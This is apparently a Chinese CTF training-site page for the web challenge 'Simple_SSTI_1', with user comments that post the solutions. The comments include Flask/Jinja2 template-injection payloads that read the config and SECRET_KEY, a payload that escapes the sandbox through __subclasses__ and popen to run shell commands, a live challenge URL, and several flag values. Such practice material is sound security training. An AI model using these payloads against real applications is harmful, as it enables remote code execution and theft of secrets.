Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 24897
提  示:
描  述:
Simple_SSTI_1
评论
tianming2022 10小时前

flag={{config}} 我直接查看配置文件就发现有了,看来存放了几个地方

回复 0

xxlituo 10小时前

http://114.67.175.224:19042/?flag={{config}}

回复 0

不懂就问 16天前

详细参考学习:https://blog.csdn.net/qq_36292543/article/details/136032550

回复 3

hejichang 1月前

flag{aced0e1bd96119f41a58510c28cfec11}

回复 0
用涉大川 9天前

每个人的flag都不一样,我的是flag{ddf1c0bc7f8ee46225efe4bf142c0079}

回复 0

ccsuaw 1月前

SECRET_KEY是什么? SECRET_KEY其实就是一个加密盐,用在django和flask的session、cookies等加密中。 所以payload为?flag={{config.SECRET_KEY}} 为什么是config.SECRET_KEY? 因为一般定义SECRET_KEY的config.py的源码是这样的: class Config(objec

回复 1

18483555203 1月前

flag{16346b3ff029db0cedd2d4d2df81df5a}

回复 0

2027347950 1月前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}

回复 0

iii1 2月前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}

回复 1

DragonWE 2月前

flag{9c260fb48e0a0db7708b6f3ebe9ff732}

回复 0

iain4048 2月前

查看源代码提示找secret key value

回复 0

WriteUp

image
valecalida

5 金币

评分(46)

解题动态

BeimingCharles 攻破了该题 1小时前
989796 攻破了该题 7小时前
wangjianguo 攻破了该题 7小时前
OldWolfofFarron 攻破了该题 8小时前
zhangpingn 攻破了该题 8小时前
tzdxhc 攻破了该题 9小时前
a828qw 攻破了该题 9小时前
tianming2022 攻破了该题 10小时前
Zhenye 攻破了该题 10小时前
linxh 攻破了该题 11小时前
yyzqlk 攻破了该题 14小时前
Augenenstern 攻破了该题 14小时前
DamonMt 攻破了该题 14小时前
yjymosheng 攻破了该题 1天前
z583985166 攻破了该题 1天前
Keefe 攻破了该题 1天前
肉松小贝 攻破了该题 1天前
yymm 攻破了该题 1天前
15093655648 攻破了该题 1天前
Nature_ 攻破了该题 1天前